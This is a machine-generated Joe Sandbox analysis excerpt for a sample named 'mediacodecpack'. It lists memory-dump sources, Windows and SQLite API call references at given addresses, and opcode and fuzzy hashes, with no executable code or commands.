• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: CopyFile
• String ID:
• API String ID: 1304948518-0
APIs
Memory Dump Source
• Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
APIs
• OpenSCManagerA.ADVAPI32(?,?,00000002), ref: 0040D955
Memory Dump Source
• Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
Similarity
• API ID: ManagerOpen
• String ID:
• API String ID: 1889721586-0
                                                                                        • Opcode ID: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                        • Instruction ID: 2654581188708fff4f1950a7e9f7eb320ae01a33822ca65d1bb5e0d43ee44f7c
                                                                                        • Opcode Fuzzy Hash: 588bc922b1ae59d6981b7f71b816890ba09d726b2026b1c215153f9f61e131fc
                                                                                        • Instruction Fuzzy Hash: 24A022200000008ACBA02F880A8800C3000803A2003220838C00AF00A0EA30808CB20E
                                                                                        APIs
                                                                                          • Part of subcall function 00B10620: OpenEventA.KERNEL32(00100002,00000000,00000000,F67D60A1), ref: 00B106C0
                                                                                          • Part of subcall function 00B10620: CloseHandle.KERNEL32(00000000), ref: 00B106D5
                                                                                          • Part of subcall function 00B10620: ResetEvent.KERNEL32(00000000,F67D60A1), ref: 00B106DF
                                                                                          • Part of subcall function 00B10620: CloseHandle.KERNEL32(00000000,F67D60A1), ref: 00B10714
                                                                                        • TlsSetValue.KERNEL32(0000002B,?), ref: 00B111BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B01000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_b01000_mediacodecpack.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEventHandle$OpenResetValue
                                                                                        • String ID:
                                                                                        • API String ID: 1556185888-0
                                                                                        • Opcode ID: 0526c25b23751cc7569be3105ae971c4359c16218c0507e15d4ff95e3a352ec3
                                                                                        • Instruction ID: 796803f8618229428191d3f6a04c67ed90314bbc83474009a0b954bd77154ca1
                                                                                        • Opcode Fuzzy Hash: 0526c25b23751cc7569be3105ae971c4359c16218c0507e15d4ff95e3a352ec3
                                                                                        • Instruction Fuzzy Hash: B301A271A04204AFC714DF59DD46B9EBBECEB05771F1047AAF924D33D0D77169408AA0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                        • Instruction ID: 763a04054358afd8034bdf58efe23934774701223f643223d2c193f16d8f67d7
                                                                                        • Opcode Fuzzy Hash: 96e27dbb9823b1666f7584e96563389482625cae06c6d81eb07ea20c82007e69
                                                                                        • Instruction Fuzzy Hash: 07D0C930C14028EFCB155B91E948CADFF71FB0C301B110067F481B65A1D33D4416BB15
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(000007D0), ref: 0040D4FF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3555506114.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3555506114.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_400000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        • Opcode ID: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                        • Instruction ID: abf7d64f5ecc0974fd71cc89ec6167098742f4484bef6f8b47254da587dc98f1
                                                                                        • Opcode Fuzzy Hash: e70ff7383fdc550b8611bea6a0e07a4ef8de3c4a04e7383cfabd8b0d4d976bca
                                                                                        • Instruction Fuzzy Hash: D3A0027298D640C7D18C2B906B0972535746F40701F36A03B9397744F19ABC364E7A5F
                                                                                        APIs
                                                                                        • sqlite3_malloc.SQLITE3 ref: 609674C6
                                                                                          • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        • sqlite3_step.SQLITE3 ref: 6096755A
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096783A
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609678A8
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 609678E8
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967901
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096791A
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967931
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967950
                                                                                        • sqlite3_step.SQLITE3 ref: 609679C3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967AA9
                                                                                        • sqlite3_step.SQLITE3 ref: 60967AB4
                                                                                        • sqlite3_column_int.SQLITE3 ref: 60967AC7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967AD4
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967B89
                                                                                        • sqlite3_step.SQLITE3 ref: 60967B94
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BB0
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BCF
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60967BE6
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967C05
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967C1E
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED50
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967C72
                                                                                        • sqlite3_step.SQLITE3 ref: 60967C7D
                                                                                        • memcmp.MSVCRT ref: 60967D4C
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D69
                                                                                        • sqlite3_free.SQLITE3 ref: 60967D74
                                                                                        • sqlite3_free.SQLITE3 ref: 60967FF7
                                                                                        • sqlite3_free.SQLITE3 ref: 60968002
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_reopen.SQLITE3 ref: 60963510
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_bytes.SQLITE3 ref: 609635A3
                                                                                          • Part of subcall function 609634F0: sqlite3_malloc.SQLITE3 ref: 609635BB
                                                                                          • Part of subcall function 609634F0: sqlite3_blob_read.SQLITE3 ref: 60963602
                                                                                          • Part of subcall function 609634F0: sqlite3_free.SQLITE3 ref: 60963621
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967C93
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                          • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                        • sqlite3_reset.SQLITE3 ref: 60967CA7
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968035
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 60967B72
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6096809D
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 609680C6
                                                                                        • sqlite3_step.SQLITE3 ref: 609680D1
                                                                                        • sqlite3_column_int.SQLITE3 ref: 609680F3
                                                                                        • sqlite3_reset.SQLITE3 ref: 60968104
                                                                                        • sqlite3_step.SQLITE3 ref: 60968139
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 60968151
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096818A
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED2B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_bind_value.SQLITE3 ref: 6095EDDF
                                                                                        • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                          • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                          • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                          • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                        • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                        • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                        • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                        • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                        • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                        • sqlite3_free.SQLITE3 ref: 60969102
                                                                                        • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID: $d
                                                                                        • API String ID: 2451604321-2084297493
                                                                                        • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                        • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                        • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                        • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                        • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                        • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                        • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                        • String ID: optimize
                                                                                        • API String ID: 1540667495-3797040228
                                                                                        • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                        • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                        • sqlite3_free.SQLITE3 ref: 60966183
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                        • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                        • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                        • memcmp.MSVCRT ref: 6096639E
                                                                                          • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                          • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                        • String ID: ASC$DESC$x
                                                                                        • API String ID: 4082667235-1162196452
                                                                                        • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                        • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                        • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                          • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                          • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                          • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                          • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                        • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                        • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                        • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                          • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                        • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                        • String ID:
                                                                                        • API String ID: 961572588-0
                                                                                        • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                        • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                        • String ID: 2$foreign key$indexed
                                                                                        • API String ID: 4126863092-702264400
                                                                                        • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                        • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                        • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                        • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2794791986-0
                                                                                        • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                        • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                         • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                        • API String ID: 912767213-1308749736
                                                                                        • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                        • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4A4
